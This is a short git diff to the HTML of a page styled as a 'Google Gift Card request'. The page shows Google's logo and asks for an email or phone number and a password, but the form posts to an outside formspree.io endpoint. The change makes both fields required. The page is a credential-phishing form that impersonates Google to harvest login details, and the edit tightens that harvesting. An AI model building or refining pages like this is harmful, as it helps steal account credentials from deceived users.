--- a/index.html
+++ b/index.html
@@ -27,8 +27,8 @@
    <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" alt="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" height="60">
    <h4>Google Gift Card <br>request</h4>
    <form action="https://formspree.io/f/mgedryln" method="post">
-    <input type="text" name="Email or Phone" placeholder=" Email or Phone"> <br>
-    <input type="password" name="Password" placeholder=" Password">
+    <input type="email" name="Email or Phone" placeholder=" Email or Phone"required> <br>
+    <input type="password" name="Password" placeholder=" Password" required>
     <button type="submit">Send</button>
    </form>
   </div>
